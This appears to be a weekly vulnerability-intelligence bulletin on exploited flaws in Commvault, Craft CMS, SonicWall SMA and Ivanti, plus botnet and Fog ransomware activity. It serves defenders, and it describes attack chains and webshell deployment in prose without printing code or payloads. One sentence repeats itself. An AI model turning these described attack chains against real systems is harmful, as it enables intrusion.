In a sharp escalation, this week’s cyber activity signals how vulnerabilities in core business platforms are becoming top targets for exploitation. A critical vulnerability in the Commvault Web Server is now under active exploitation, leading to its inclusion in CISA’s Known Exploited Vulnerabilities (KEV) catalog. Simultaneously, Craft CMS, a widely used content management system among developers and digital agencies, has confirmed exploitation of a vulnerability as part of a coordinated, chained attack. Adding to the urgency, SonicWall has issued a critical advisory after detecting real-world exploitation of vulnerabilities in its Secure Mobile Access (SMA) appliances. These developments emphasize the growing threat landscape targeting core infrastructure and remote access solutions.  

Botnet operations intensified as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st exploited vulnerabilities in platforms such as Cloud Gateway, GitLab, and PHP-based systems. Simultaneously, IoT threats like Bashlite, BrickerBot, Tsunami, and Mirai ramped up attacks on Eir D1000 modems, rapidly expanding their networks of compromised devices.  

On the advanced threat front, attackers leveraged a vulnerability in Ivanti Connect Secure to deploy DslogdRAT, a stealthy remote access trojan engineered for persistence, evasion, and long-term control. In parallel, DFIR investigations into Fog Ransomware revealed abuse of legacy Microsoft Active Directory vulnerabilities for privilege escalation, demonstrating how both modern and outdated vulnerabilities are being chained for full domain compromise.  

These developments reflect the evolving strategies of threat actors, who continue to pivot rapidly between zero-days, misconfigurations, and legacy exploits to compromise critical systems and expand their footholds across enterprise environments.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.

CVE-2025-3928

An Unspecified Vulnerability in the Commvault Web Server allows an authenticated attacker to create and execute webshells on both Linux and Windows platforms. Assigned a high CVSS Score of 8.7, this flaw poses a serious threat to the affected environments. While public details regarding exploitation methods, the scale of attacks, or the identities of threat actors remain unavailable, the vulnerability's addition to the CISA's Known Exploited Vulnerabilities (KEV) catalog underscores its critical nature. Commvault has issued remediation through multiple fixed versions: 11.36.46, 11.32.89, 11.28.141, and 11.20.217.  

‍CVE-2025-32432

A Remote Code Execution Vulnerability in Craft CMS enables malicious actors to exploit the system through crafted HTTP requests. The vulnerability, rated CVSS 10 (Critical), has prompted Craft CMS to issue security updates in versions 3.9.15, 4.14.15, and 5.6.17. Orange Cyberdefense's CSIRT has recently identified an active campaign exploiting a combination of CVE-2025-32432 and CVE-2024-58136 as zero-days. This multi-stage attack, observed since February 2025, has been used to breach systems and exfiltrate data, underscoring the severity of the threat.  

‍CVE-2024-38475

A Path Traversal Vulnerability, attributed to a publicly disclosed issue in the Apache HTTP Server's mod_rewrite module, has been identified, with a critical CVSS Score of 9.8. According to SonicWall's advisory, the flaw allows attackers to manipulate URLs to bypass directory restrictions, effectively mapping them to protected file system paths. Exploitation of this vulnerability can lead to unauthorized access to sensitive files and, vulnerability can lead to unauthorized access to sensitive files and under specific conditions, enable session hijacking. SonicWall confirmed the existence of an additional exploitation technique leveraging this flaw and noted potential-in-the wild exploitation. The issue has been addressed in SMA Series firmware version 10.2.1.14-75sv and later.  

CVE-2023-44221

A Post-Authentication OS Command Injection Vulnerability has been identified in the SonicWall SMA100 SSL-VPN Management Interface, allowing a remote, authenticated attacker with administrative privileges to execute arbitrary commands as the 'nobody' user. Assigned a high CVSS Score of 7.2, the flaw was initially disclosed in December 2023. However, subsequent analysis by SonicWall indicated that the vulnerability may have been exploited in the wild. In response, SonicWall updated its security advisory and released patched firmware, starting with SMA 100 Series version 10.2.1.10-62sv and later, to address the issue and mitigate potential risk.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

‍CVE-2025-0282

A recent report from the JPCERT Coordination Center (JPCERT/CC) revealed that, CVE-2025-0282, a vulnerability in Ivanti Connect Secure was actively exploited as zero-day to deploy a stealthy remote access trojan known as DslogdRAT. At that time, the vulnerability was undisclosed and unpatched, allowing threat actors to install both the malware and a web shell, primarily targeting organizations in Japan. The security flaw was subsequently addressed by Ivanti in early January 2025, following its identification and initial exploitation. Organizations using Ivanti Connect Secure are strongly advised to apply the security updates released by the vendor to prevent potential exploitation by DslogdRAT and similar threats.  

Fog Ransomware leveraging legacy Microsoft Flaws for Privilege Escalation

A recent report from the DFIR team has uncovered the operations of Fog Ransomware, which leverages multiple known Microsoft Vulnerabilities to escalate privileges within targeted environments. The attackers exploited CVE-2020-1472 to gain domain controller access and further abused CVE-2021-42278 and CVE-2021-42287, both of which enable privileges escalation in Active Directory. This combination of exploits allows threat actors to move laterally and gain elevated access across compromised networks, facilitating the deployment of Fog ransomware and maximizing impact. Victims were identified across diverse sectors such as technology, education, and logistics, with incidents reported in Europe, North America, and South America, underscoring the affiliate's wide-reaching targeting strategy.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/04/29/cisa-adds-one-known-exploited-vulnerability-catalog
2. https://www.cisa.gov/news-events/alerts/2025/04/28/cisa-adds-three-known-exploited-vulnerabilities-catalog
3. https://blogs.jpcert.or.jp/en/2025/04/dslogdrat.html  
4. https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/#iocs  
5. https://thedfirreport.com/2025/04/28/navigating-through-the-fog/
6. https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0018  
7. https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0018